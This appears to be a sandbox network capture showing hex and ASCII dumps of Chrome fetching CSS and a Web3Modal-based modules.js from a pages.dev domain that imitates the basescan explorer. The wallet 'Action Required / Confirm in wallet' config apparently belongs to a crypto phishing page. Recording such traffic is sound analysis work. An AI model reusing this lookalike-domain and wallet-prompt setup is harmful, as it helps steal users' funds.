                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 2e 34 37 35 72 65 6d 20 2b 20 32 2e 37 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 34 32 35 72 65 6d 20 2b 20 32 2e 31 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63
                                                                                                                                                                                                                                              Data Ascii: .475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-size:calc(1.425rem + 2.1vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-5{font-size:3rem}}.display-6{font-size:c
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 72 2d 78 29 20 2a 20 2e 35 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2a 20 2e 35 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 35 34 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a
                                                                                                                                                                                                                                              Data Ascii: r-x) * .5);padding-left:calc(var(--bs-gutter-x) * .5);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              28192.168.2.549759172.66.44.1714435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC401OUTGET /modules.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 1469354
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "23c44ca59fddb7cb35e3fa398932a1d0"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lo35PuUgh07a%2F0arTWAzTuDyJTpBtnJeHut0aHAymi2dfA%2Fst6DEvu5OcQsiQ1ELfanZi4s7eiLvxP982RP%2FPRAU8q0%2B4fbIz%2FltopKqfOueELPsLiIyIPgNfo%2BzAUzkjc7KTUFkTOZfzqw%2FlCtIjQvztMe8%2F%2B%2FUNPFrQSJBMnrWYzKWTZESdqeknKQZn5A9x9hlpGA0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c23b0e42c7-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC560INData Raw: 77 69 6e 64 6f 77 2e 74 68 65 6d 65 4d 6f 64 65 20 3d 20 22 64 61 72 6b 22 3b 0a 0a 6c 65 74 20 63 66 67 20 3d 20 7b 0a 20 20 64 6f 6d 61 69 6e 3a 20 27 68 74 74 70 73 3a 2f 2f 77 65 62 33 6d 6f 64 61 6c 2e 63 6f 6d 27 2c 0a 20 20 64 65 73 63 72 69 70 74 69 6f 6e 3a 20 27 57 65 62 33 4d 6f 64 61 6c 27 2c 0a 20 20 6e 61 6d 65 3a 20 27 57 65 62 33 4d 6f 64 61 6c 27 2c 0a 20 20 69 63 6f 6e 3a 20 27 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 75 2f 33 37 37 38 34 38 38 36 27 2c 0a 20 20 68 65 61 64 65 72 54 65 78 74 3a 22 41 63 74 69 6f 6e 20 52 65 71 75 69 72 65 64 22 2c 0a 20 20 6d 69 64 64 6c 65 48 65 61 64 65 72 54 65 78 74 3a 22 43 6f 6e 66 69 72 6d 20 69 6e 20 77 61 6c 6c 65 74 22 2c
                                                                                                                                                                                                                                              Data Ascii: window.themeMode = "dark";let cfg = { domain: 'https://web3modal.com', description: 'Web3Modal', name: 'Web3Modal', icon: 'https://avatars.githubusercontent.com/u/37784886', headerText:"Action Required", middleHeaderText:"Confirm in wallet",
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 6c 6f 61 64 22 29 29 29 7b 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 6c 69 6e 6b 5b 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 5d 27 29 29 74 28 65 29 3b 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 65 3d 3e 7b 66 6f 72 28 63 6f 6e 73 74 20 72 20 6f 66 20 65 29 69 66 28 22 63 68 69 6c 64 4c 69 73 74 22 3d 3d 3d 72 2e 74 79 70 65 29 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 72 2e 61 64 64 65 64 4e 6f 64 65 73 29 22 4c 49 4e 4b 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 26 26 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 3d 3d 3d 65 2e 72 65 6c 26 26 74 28 65 29 7d 29 29 2e 6f 62 73 65 72 76 65 28 64 6f 63 75 6d 65 6e 74 2c 7b 63 68 69 6c 64
                                                                                                                                                                                                                                              Data Ascii: load"))){for(const e of document.querySelectorAll('link[rel="modulepreload"]'))t(e);new MutationObserver((e=>{for(const r of e)if("childList"===r.type)for(const e of r.addedNodes)"LINK"===e.tagName&&"modulepreload"===e.rel&&t(e)})).observe(document,{child
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 5b 5d 3a 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 29 3b 72 65 74 75 72 6e 20 44 36 28 61 2c 21 30 29 2c 69 2e 73 65 74 28 65 2c 5b 74 2c 61 5d 29 2c 52 65 66 6c 65 63 74 2e 6f 77 6e 4b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 61 2c 74 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6e 3d 52 65 66 6c 65 63 74 2e 67 65 74 28 65 2c 74 29 2c 69 3d 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 3b 69 66 28 62 64 2e 68 61 73 28 6e 29 29 44 36 28 6e 2c 21
                                                                                                                                                                                                                                              Data Ascii: rray.isArray(e)?[]:Object.create(Object.getPrototypeOf(e));return D6(a,!0),i.set(e,[t,a]),Reflect.ownKeys(e).forEach((t=>{if(Object.getOwnPropertyDescriptor(a,t))return;const n=Reflect.get(e,t),i={value:n,enumerable:!0,configurable:!0};if(bd.has(n))D6(n,!
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 65 74 28 65 2c 5b 74 2c 72 5d 29 7d 65 6c 73 65 20 70 2e 73 65 74 28 65 2c 5b 74 5d 29 7d 29 28 6e 2c 65 29 7d 72 65 74 75 72 6e 20 52 65 66 6c 65 63 74 2e 73 65 74 28 74 2c 6e 2c 64 2c 6f 29 2c 68 28 5b 22 73 65 74 22 2c 5b 6e 5d 2c 69 2c 6c 5d 29 2c 21 30 7d 7d 29 3b 73 2e 73 65 74 28 6e 2c 76 29 3b 63 6f 6e 73 74 20 79 3d 5b 6d 2c 28 65 3d 2b 2b 61 5b 31 5d 29 3d 3e 28 64 21 3d 3d 65 26 26 21 75 2e 73 69 7a 65 26 26 28 64 3d 65 2c 70 2e 66 6f 72 45 61 63 68 28 28 28 5b 74 5d 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 74 5b 31 5d 28 65 29 3b 72 3e 6c 26 26 28 6c 3d 72 29 7d 29 29 29 2c 6c 29 2c 6f 2c 65 3d 3e 28 75 2e 61 64 64 28 65 29 2c 31 3d 3d 3d 75 2e 73 69 7a 65 26 26 70 2e 66 6f 72 45 61 63 68 28 28 28 5b 65 2c 74 5d 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20
                                                                                                                                                                                                                                              Data Ascii: et(e,[t,r])}else p.set(e,[t])})(n,e)}return Reflect.set(t,n,d,o),h(["set",[n],i,l]),!0}});s.set(n,v);const y=[m,(e=++a[1])=>(d!==e&&!u.size&&(d=e,p.forEach((([t])=>{const r=t[1](e);r>l&&(l=r)}))),l),o,e=>(u.add(e),1===u.size&&p.forEach((([e,t],r)=>{const
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 7d 3b 72 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 7d 65 6c 73 65 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 74 2c 6e 2e 67 65 74 3f 6e 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 7d 7d 29 7d 29 29 2c 72 7d
                                                                                                                                                                                                                                              Data Ascii: };r.prototype=t.prototype}else r={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.keys(e).forEach((function(t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(r,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})})),r}
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 2c 74 29 7b 69 66 28 70 74 2e 69 73 48 74 74 70 55 72 6c 28 65 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 6d 61 74 55 6e 69 76 65 72 73 61 6c 55 72 6c 28 65 2c 74 29 3b 6c 65 74 20 72 3d 65 3b 72 2e 69 6e 63 6c 75 64 65 73 28 22 3a 2f 2f 22 29 7c 7c 28 72 3d 65 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 2f 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 3a 22 2c 22 22 29 2c 72 3d 60 24 7b 72 7d 3a 2f 2f 60 29 2c 72 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 7c 7c 28 72 3d 60 24 7b 72 7d 2f 60 29 3b 72 65 74 75 72 6e 7b 72 65 64 69 72 65 63 74 3a 60 24 7b 72 7d 77 63 3f 75 72 69 3d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 7d 60 2c 68 72 65 66 3a 72 7d 7d 2c 66 6f 72 6d 61 74 55 6e 69 76 65 72 73 61 6c 55 72 6c 28 65 2c
                                                                                                                                                                                                                                              Data Ascii: ,t){if(pt.isHttpUrl(e))return this.formatUniversalUrl(e,t);let r=e;r.includes("://")||(r=e.replaceAll("/","").replaceAll(":",""),r=`${r}://`),r.endsWith("/")||(r=`${r}/`);return{redirect:`${r}wc?uri=${encodeURIComponent(t)}`,href:r}},formatUniversalUrl(e,
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 61 6e 64 6f 6d 55 55 49 44 28 29 3a 22 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 75 2c 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 3b 72 65 74 75 72 6e 28 22 78 22 3d 3d 3d 65 3f 74 3a 33 26 74 7c 38 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 7d 29 29 7d 2c 6c 6e 3d 71 69 28 7b 69 73 43 6f 6e 6e 65 63 74 65 64 3a 21 31 7d 29 2c 52 72 3d 7b 73 74 61 74 65 3a 6c 6e 2c 73 75 62 73 63 72 69 62 65 3a 65 3d 3e 65 75 28 6c 6e 2c 28 28 29 3d 3e 65 28 6c 6e 29 29 29 2c 73 75 62 73 63 72 69 62 65 4b 65 79 3a 28 65 2c 74 29 3d 3e 79 6f 28 6c 6e 2c 65 2c 74 29 2c 73 65 74 49 73 43 6f 6e 6e 65 63 74 65 64
                                                                                                                                                                                                                                              Data Ascii: andomUUID():"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/gu,(e=>{const t=16*Math.random()|0;return("x"===e?t:3&t|8).toString(16)}))},ln=qi({isConnected:!1}),Rr={state:ln,subscribe:e=>eu(ln,(()=>e(ln))),subscribeKey:(e,t)=>yo(ln,e,t),setIsConnected
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 68 28 6e 2c 7b 6d 65 74 68 6f 64 3a 22 44 45 4c 45 54 45 22 2c 68 65 61 64 65 72 73 3a 74 2c 62 6f 64 79 3a 65 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 76 6f 69 64 20 30 7d 29 29 2e 6a 73 6f 6e 28 29 7d 63 72 65 61 74 65 55 72 6c 28 7b 70 61 74 68 3a 65 2c 70 61 72 61 6d 73 3a 74 7d 29 7b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 55 52 4c 28 65 2c 74 68 69 73 2e 62 61 73 65 55 72 6c 29 3b 72 65 74 75 72 6e 20 74 26 26 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 28 5b 65 2c 74 5d 29 3d 3e 7b 74 26 26 72 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 61 70 70 65 6e 64 28 65 2c 74 29 7d 29 29 2c 72 7d 7d 63 6f 6e 73 74 20 63 77 3d 22 57 41 4c 4c 45 54 43 4f 4e 4e 45 43 54 5f 44 45 45 50 4c 49 4e 4b 5f 43 48 4f 49 43
                                                                                                                                                                                                                                              Data Ascii: h(n,{method:"DELETE",headers:t,body:e?JSON.stringify(e):void 0})).json()}createUrl({path:e,params:t}){const r=new URL(e,this.baseUrl);return t&&Object.entries(t).forEach((([e,t])=>{t&&r.searchParams.append(e,t)})),r}}const cw="WALLETCONNECT_DEEPLINK_CHOIC
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 72 6c 22 29 7d 7d 7d 2c 6c 63 3d 71 69 28 7b 77 61 6c 6c 65 74 49 6d 61 67 65 73 3a 7b 7d 2c 6e 65 74 77 6f 72 6b 49 6d 61 67 65 73 3a 7b 7d 2c 63 6f 6e 6e 65 63 74 6f 72 49 6d 61 67 65 73 3a 7b 7d 2c 74 6f 6b 65 6e 49 6d 61 67 65 73 3a 7b 7d 7d 29 2c 43 63 3d 7b 73 74 61 74 65 3a 6c 63 2c 73 75 62 73 63 72 69 62 65 4e 65 74 77 6f 72 6b 49 6d 61 67 65 73 3a 65 3d 3e 65 75 28 6c 63 2e 6e 65 74 77 6f 72 6b 49 6d 61 67 65 73 2c 28 28 29 3d 3e 65 28 6c 63 2e 6e 65 74 77 6f 72 6b 49 6d 61 67 65 73 29 29 29 2c 73 75 62 73 63 72 69 62 65 4b 65 79 3a 28 65 2c 74 29 3d 3e 79 6f 28 6c 63 2c 65 2c 74 29 2c 73 65 74 57 61 6c 6c 65 74 49 6d 61 67 65 28 65 2c 74 29 7b 6c 63 2e 77 61 6c 6c 65 74 49 6d 61 67 65 73 5b 65 5d 3d 74 7d 2c 73 65 74 4e 65 74 77 6f 72 6b 49 6d
                                                                                                                                                                                                                                              Data Ascii: rl")}}},lc=qi({walletImages:{},networkImages:{},connectorImages:{},tokenImages:{}}),Cc={state:lc,subscribeNetworkImages:e=>eu(lc.networkImages,(()=>e(lc.networkImages))),subscribeKey:(e,t)=>yo(lc,e,t),setWalletImage(e,t){lc.walletImages[e]=t},setNetworkIm
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 74 77 6f 72 6b 49 64 73 7d 2c 61 73 79 6e 63 20 73 77 69 74 63 68 41 63 74 69 76 65 4e 65 74 77 6f 72 6b 28 65 29 7b 61 77 61 69 74 20 74 68 69 73 2e 5f 67 65 74 43 6c 69 65 6e 74 28 29 2e 73 77 69 74 63 68 43 61 69 70 4e 65 74 77 6f 72 6b 28 65 29 2c 59 6e 2e 63 61 69 70 4e 65 74 77 6f 72 6b 3d 65 7d 2c 72 65 73 65 74 4e 65 74 77 6f 72 6b 28 29 7b 59 6e 2e 69 73 44 65 66 61 75 6c 74 43 61 69 70 4e 65 74 77 6f 72 6b 7c 7c 28 59 6e 2e 63 61 69 70 4e 65 74 77 6f 72 6b 3d 76 6f 69 64 20 30 29 2c 59 6e 2e 61 70 70 72 6f 76 65 64 43 61 69 70 4e 65 74 77 6f 72 6b 49 64 73 3d 76 6f 69 64 20 30 2c 59 6e 2e 73 75 70 70 6f 72 74 73 41 6c 6c 4e 65 74 77 6f 72 6b 73 3d 21 30 7d 7d 2c 65 73 3d 71 69 28 7b 70 72 6f 6a 65 63 74 49 64 3a 22 22 2c 73 64 6b 54 79 70 65 3a
                                                                                                                                                                                                                                              Data Ascii: tworkIds},async switchActiveNetwork(e){await this._getClient().switchCaipNetwork(e),Yn.caipNetwork=e},resetNetwork(){Yn.isDefaultCaipNetwork||(Yn.caipNetwork=void 0),Yn.approvedCaipNetworkIds=void 0,Yn.supportsAllNetworks=!0}},es=qi({projectId:"",sdkType:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              29192.168.2.549760104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC609OUTGET /assets/css/custom.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Content-Length: 2698
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=5329
                                                                                                                                                                                                                                              ETag: "0506ab9915da1:0"
                                                                                                                                                                                                                                              Last-Modified: Mon, 23 Oct 2023 09:17:20 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87382
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXMeDuT3QoPXftokvMXU5pkXzu64l9r1dYVzCFNYK36kTvR0%2FkwbLnoUyWFrmDKrtpqKdT%2F29zOe0EDxCgIzp8VHaabGMqhg%2Fm1Ia5y%2BD7Ucz6n7clsLK26P8ao4fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c64bee42bc-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC509INData Raw: ef bb bf 2e 77 72 61 70 70 65 72 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 2d 39 39 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 21 69 6d 70 6f 72 74 61 6e 74 7d 23 70 75 73 68 7b 68 65 69 67 68 74 3a 39 39 70 78 7d 62 6f 64 79 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 77 72 61 70 70 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 33 32 61 34 37 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a
                                                                                                                                                                                                                                              Data Ascii: .wrapper{height:auto!important;height:100%;margin:0 auto -99px;min-height:100%;background-color:#f8f9fa!important}#push{height:99px}body.dark-mode .wrapper{background-color:#132a47!important}.ui-autocomplete{max-height:300px;overflow-y:auto;overflow-x:
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 6a 76 65 63 74 6f 72 6d 61 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 68 64 2d 64 6f 63 2d 73 65 61 72 63 68 5f 5f 63 61 74 65 67 6f 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6c 6f 72 3a 23 33 37 37 64 66 66 7d 2e 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 31 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 31 32 35 72 65 6d 7d 2e 61 6e 6f 6d 61 6c 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 39 66 39
                                                                                                                                                                                                                                              Data Ascii: -weight:700}.jvectormap-container{width:100%;height:100%}.hd-doc-search__category{display:block;color:#377dff}.ui-autocomplete-input.form-control:not(:last-child){border-top-right-radius:.125rem;border-bottom-right-radius:.125rem}.anomaly{background:#f9f9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC820INData Raw: 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 66 36 61 37 34 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 66 36 61 37 34 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 67 2d 6c 69 67 68 74 2e 74 65 78 74 2d 77 68 69 74 65 7b 63 6f 6c 6f 72 3a 23 33 30 33 31 33 32 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 67 2d 69 6e 66 6f 2e 74 65 78 74 2d 77 68 69 74 65 20 61 7b 63 6f 6c 6f 72 3a 23 31 31 33 62 37 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 67 2d 77 61 72 6e 69 6e 67 2e 74
                                                                                                                                                                                                                                              Data Ascii: led):not(.disabled):active,.show>.btn-secondary.dropdown-toggle{color:#fff!important;border-color:#5f6a74!important;background-color:#5f6a74!important}.bg-light.text-white{color:#303132!important}.bg-info.text-white a{color:#113b7a!important}.bg-warning.t


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              30192.168.2.549762104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
